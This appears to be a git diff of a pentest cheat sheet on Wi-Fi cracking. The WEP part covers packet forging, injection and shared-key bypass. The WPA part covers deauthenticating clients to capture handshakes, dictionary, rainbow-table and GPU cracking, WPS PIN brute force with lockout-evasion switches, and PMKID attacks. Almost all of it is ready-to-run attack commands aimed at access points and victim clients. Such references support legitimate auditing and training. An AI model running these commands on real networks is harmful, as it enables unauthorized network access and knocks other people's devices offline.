||||||
|
|
||||||
|
# check the packet and find the network addresses
|
||||||
|
tcpdump -n -vvv -e -s0 -r inject.cap
|
||||||
|
|
||||||
|
# use our PRGA from the fragmentation attack
|
||||||
|
# SRC_ADDR: 192.168.1.100
|
||||||
|
# DST_ADDR: 192.168.1.255, should not exist (broadcast address)
|
||||||
|
packetforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y prga.xor -w chochop_out.cap
|
||||||
|
|
||||||
|
# inject our crafted packet
|
||||||
|
aireplay-ng -2 -r chochop_out.cap mon0
|
||||||
|
|
||||||
|
# crack the WEP key
|
||||||
|
aircrack-ng -0 wepcrack
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Bypassing WEP Shared Key Authentication SKA
|
||||||
|
|
||||||
|
> By default, most wireless drivers will attempt open authentication first. If open authentication fails, they will proceed to try shared authentication.
|
||||||
|
|
||||||
|
Prerequisite:
|
||||||
|
|
||||||
|
* Authentication: Shared Key
|
||||||
|
* When Fake Authentication => `AP rejects open-system authentication`
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# put into monitor mode on our desired channel
|
||||||
|
airmon-ng start wlan0 3 # only a particular channel : 3
|
||||||
|
airodump-ng -c 3 --bssid $AP_MAC -w sharedkey mon0
|
||||||
|
|
||||||
|
# deauthentication attack on the connected client
|
||||||
|
# airodump should display SKA under the AUTH column
|
||||||
|
# PRGA file will be saved as xxxx.xor
|
||||||
|
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
||||||
|
# TO CHECK aireplay-ng -0 10 –a $AP_MAC -c $VICTIM_MAC mon0
|
||||||
|
|
||||||
|
# fake authentication attack with association timing (every 60s try to reassociate)
|
||||||
|
# should display switching to Shared Key Authentication
|
||||||
|
# If you are using a PRGA file obtained from a chopchop attack, make sure that it is at least 144 bytes long
|
||||||
|
# If you have "Part2: Association Not answering...(Step3)" -> spoof the mac address used to fake auth
|
||||||
|
aireplay-ng -1 60 -e $AP_SSID -y sharedkey.xor -b $AP_MAC -h $ATTACKER_MAC mon0
|
||||||
|
|
||||||
|
# ARP replay attack
|
||||||
|
aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0
|
||||||
|
|
||||||
|
# deauthentication attack on the connected client
|
||||||
|
# speed the ARP attack process using deauth
|
||||||
|
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
||||||
|
# TO CHECK: aireplay-ng –-deauth 1 –a $AP_MAC -h <FakedMac> wlan0mon
|
||||||
|
|
||||||
|
# crack the WEP key
|
||||||
|
aircrack-ng sharedkey.cap
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [TODO](TODO)
|
|
@ -0,0 +1,220 @@
|
||||||
|
# Wifi - WPA Cracking
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
* [aircrack-ng/aircrack-ng](https://github.com/aircrack-ng/aircrack-ng) - WiFi security auditing tools suite
|
||||||
|
* [bettercap/bettercap](https://github.com/bettercap/bettercap)
|
||||||
|
|
||||||
|
|
||||||
|
## WPA PSK Attack
|
||||||
|
|
||||||
|
### Cracking WPA with John the Ripper
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# put into monitor mode on our desired channel
|
||||||
|
airmon-ng start wlan0 3 # only a particular channel : 3
|
||||||
|
airodump-ng -c 3 --bssid $AP_MAC -w wpajohn mon0 # see no client
|
||||||
|
|
||||||
|
# deauthentication to get the WPA handshake (Sniffing should show the 4-way handshake)
|
||||||
|
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
||||||
|
|
||||||
|
# crack without john the ripper (-b <BSSID>)
|
||||||
|
aircrack-ng -0 -w /pentest/passwords/john/password.lst wpajohn-01.cap
|
||||||
|
aircrack-ng -0 -w /pentest/passwords/john/password.lst wpajohn-01.cap
|
||||||
|
aircrack-ng -w password.lst,secondlist.txt wpajohn-01.cap # multiple dicts
|
||||||
|
|
||||||
|
# crack with john the ripper - combine mangling rules with aircrack
|
||||||
|
# rules example to add in /pentest/passwords/john/john.conf
|
||||||
|
# $[0-9]$[0-9]
|
||||||
|
# $[0-9]$[0-9]$[0-9]
|
||||||
|
john --wordlist=/pentest/wireless/aircrack-ng/test/password.lst --rules --stdout | aircrack-ng -0 -e $AP_SSID -w - /root/wpajohn
|
||||||
|
|
||||||
|
# generate PMKs for a faster cracking - Precomputed WPA Keys Database Attack
|
||||||
|
echo wifu > essid.txt
|
||||||
|
airolib-ng test.db --import essid essid.txt
|
||||||
|
airolib-ng test.db --stats
|
||||||
|
airolib-ng test.db --import passwd /pentest/passwords/john/password.lst
|
||||||
|
airolib-ng test.db --batch
|
||||||
|
airolib-ng test.db --stats
|
||||||
|
aircrack-ng -r test.db wpajohn-01.cap
|
||||||
|
# airolib-ng test.db --clean all
|
||||||
|
|
||||||
|
# Not in lab - Convert to hccap to use with John Jumbo
|
||||||
|
aircrack-ng <FileName>.cap -J <outFile>
|
||||||
|
hccap2john <outFile>.hccap > <JohnOutFile>
|
||||||
|
john <JohnOutFile>
|
||||||
|
```
|
||||||
|
|
||||||
|
### Cracking WPA with coWPAtty
|
||||||
|
|
||||||
|
> Better for PMK Rainbow table attacks
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# put into monitor mode on our desired channel
|
||||||
|
airmon-ng start wlan0 3 # only a particular channel : 3
|
||||||
|
airodump-ng -c 3 --bssid $AP_MAC -w wpacow mon0 # see no client
|
||||||
|
|
||||||
|
# deauthentication to get the WPA handshake
|
||||||
|
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
||||||
|
|
||||||
|
# coWPAtty dictionary mode (slow)
|
||||||
|
cowpatty -r wpacow-01.cap -f /pentest/passwords/john/password.lst -2 -s $AP_SSID
|
||||||
|
|
||||||
|
# coWPAtty rainbow table mode (fast)
|
||||||
|
genpmk -f /pentest/passwords/john/password.lst -d wifuhashes -s $AP_SSID
|
||||||
|
cowpatty -r wpacow-01.cap -d wifuhashes -2 -s $AP_SSID
|
||||||
|
```
|
||||||
|
|
||||||
|
### Cracking WPA with Pyrit
|
||||||
|
|
||||||
|
> Can use GPU
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# put into monitor mode on our desired channel
|
||||||
|
airmon-ng start wlan0 3 # only a particular channel : 3
|
||||||
|
airodump-ng -c 3 --bssid $AP_MAC -w wpapyrit mon0 # see no client
|
||||||
|
|
||||||
|
# deauthentication to get the WPA handshake
|
||||||
|
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
||||||
|
|
||||||
|
# clean the cap and extract only good packets
|
||||||
|
pyrit -r wpapyrit-01.cap analyze
|
||||||
|
pyrit -r wpapyrit-01.cap -o wpastripped.cap strip
|
||||||
|
|
||||||
|
# dictionary attack - slow ++
|
||||||
|
pyrit -r wpapyrit-01.cap -i /pentest/passwords/john/password.lst -b $AP_MAC attack_passthrough
|
||||||
|
|
||||||
|
# pre-computed hashes attack - slow on CPU
|
||||||
|
pyrit eval # pwds in database
|
||||||
|
pyrit -i /pentest/passwords/john/password.lst import_passwords # import in the database
|
||||||
|
pyrit -e $AP_SSID create_essid
|
||||||
|
pyrit batch # generate
|
||||||
|
pyrit -r wpastripped.cap attack_db
|
||||||
|
|
||||||
|
# gpu power attack - fast on GPU
|
||||||
|
pyrit list_cores
|
||||||
|
pyrit -i /pentest/passwords/john/password.lst import_passwords # import in the database
|
||||||
|
pyrit -e $AP_SSID create_essid
|
||||||
|
pyrit batch
|
||||||
|
pyrit -r wpastripped.cap attack_db
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Cracking WPA with bettercap
|
||||||
|
|
||||||
|
* Install Bettercap
|
||||||
|
```powershell
|
||||||
|
# install and update
|
||||||
|
go get github.com/bettercap/bettercap
|
||||||
|
cd $GOPATH/src/github.com/bettercap/bettercap
|
||||||
|
make build && sudo make install
|
||||||
|
sudo bettercap -eval "caplets.update; q"
|
||||||
|
```
|
||||||
|
|
||||||
|
* Scan for Wifi networks
|
||||||
|
```ps1
|
||||||
|
# run and recon the wifi APs
|
||||||
|
sudo bettercap -iface wlan0
|
||||||
|
# this will set the interface in monitor mode and start channel hopping on all supported frequencies
|
||||||
|
> wifi.recon on
|
||||||
|
# we want our APs sorted by number of clients for this attack, the default sorting would be `rssi asc`
|
||||||
|
> set wifi.show.sort clients desc
|
||||||
|
# every second, clear our view and present an updated list of nearby WiFi networks
|
||||||
|
> set ticker.commands 'clear; wifi.show'
|
||||||
|
> ticker on
|
||||||
|
# use the good channel
|
||||||
|
> wifi.recon.channel 1
|
||||||
|
```
|
||||||
|
|
||||||
|
* Execute the deauth attack
|
||||||
|
```powershell
|
||||||
|
# use the bssid of the AP
|
||||||
|
> wifi.deauth e0:xx:xx:xx:xx:xx
|
||||||
|
/path/to/cap2hccapx /root/bettercap-wifi-handshakes.pcap bettercap-wifi-handshakes.hccapx
|
||||||
|
/path/to/hashcat -m 2500 -a3 -w3 bettercap-wifi-handshakes.hccapx '?d?d?d?d?d?d?d?d'
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## WPA WPS Attack
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airmon-ng start wlan0
|
||||||
|
airodump-ng mon0
|
||||||
|
|
||||||
|
# Install
|
||||||
|
apt-get -y install build-essential libpcap-dev aircrack-ng pixiewps
|
||||||
|
git clone https://github.com/t6x/reaver-wps-fork-t6x
|
||||||
|
apt-get install reaver
|
||||||
|
|
||||||
|
# Reaver integrated dumping tool (can also airodump-ng)
|
||||||
|
# Wash gives information about WPS being locked or not
|
||||||
|
# Locked WPS will have less success chances
|
||||||
|
wash -i mon0
|
||||||
|
|
||||||
|
# Launch Reaver
|
||||||
|
reaver -i mon0 -b $AP_MAC -vv -S
|
||||||
|
reaver -i mon0 -c <Channel> -b $AP_MAC -p <PinCode> -vv -S
|
||||||
|
reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv
|
||||||
|
|
||||||
|
|
||||||
|
# Now using pixiexps, you can crack PIN offline
|
||||||
|
pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
|
||||||
|
# Then, you can use the PIN with reaver to get to cleartext password
|
||||||
|
reaver -i <monitor interface> -b <bssid> -c <channel> -p <PIN>
|
||||||
|
|
||||||
|
|
||||||
|
# Some manufacturers have implemented protections
|
||||||
|
# You can try different switches to bypass
|
||||||
|
# -L = Ignore locked state
|
||||||
|
# -N = Don't send NACK packets when errors are detected
|
||||||
|
# -d = delay X seconds between PIN attempts
|
||||||
|
# -T = set timeout period to X second (.5 means half second)
|
||||||
|
# -r = After X attemps, sleep for Y seconds
|
||||||
|
reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv -L -N -d 15 -T .5 -r 3:15
|
||||||
|
```
|
||||||
|
|
||||||
|
> Message "WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying" -> AP is protected Message "WARNING: Receive timeout occured" -> AP is too far
|
||||||
|
|
||||||
|
|
||||||
|
## WPA PMKID Attack
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
INTERFACE=$(ifconfig | grep wlp | cut -d":" -f1) # mon0
|
||||||
|
|
||||||
|
# PMKID capture
|
||||||
|
# Note: Based on the noise on the wifi channel it can take some time to receive the PMKID.
|
||||||
|
# It can take a while to capture PKMID (several minutes++)
|
||||||
|
# We recommend running hcxdumptool up to 10 minutes before aborting.
|
||||||
|
# If an AP recieves our association request packet and supports sending
|
||||||
|
# sudo hcxdumptool -i wlan0mon -o outfile.pcapng --enable_status=1
|
||||||
|
PMKID=$(sudo hcxdumptool -o test.pcapng -i $INTERFACE --enable_status --filtermode=2)
|
||||||
|
echo $PMKID|grep 'FOUND PMKID' &> /dev/null
|
||||||
|
hcxpcaptool -z test.16800 test.pcapng
|
||||||
|
|
||||||
|
# Then convert the captured data to a suitable format for hashcat
|
||||||
|
# -E retrieve possible passwords from WiFi-traffic (additional, this list will include ESSIDs)
|
||||||
|
# -I retrieve identities from WiFi-traffic
|
||||||
|
# -U retrieve usernames from WiFi-traffic
|
||||||
|
# PMKID*MAC AP*MAC Station*ESSID
|
||||||
|
# 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a
|
||||||
|
hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng
|
||||||
|
|
||||||
|
# Cracking the HASH
|
||||||
|
hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
|
||||||
|
hashcat -m 16800 -d 1 -w 3 myHashes rockyou.txt
|
||||||
|
|
||||||
|
# Check clGetPlatformIDs(): CL_PLATFORM_NOT_FOUND_KHR
|
||||||
|
```
|
||||||
|
|
||||||
|
**Bettercap WPA - PMKID attack**
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
wifi.assoc all
|
||||||
|
/path/to/hcxpcaptool -z bettercap-wifi-handshakes.pmkid /root/bettercap-wifi-handshakes.pcap
|
||||||
|
/path/to/hashcat -m16800 -a3 -w3 bettercap-wifi-handshakes.pmkid '?d?d?d?d?d?d?d?d'
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [TODO](TODO)
|
Loading…
Reference in New Issue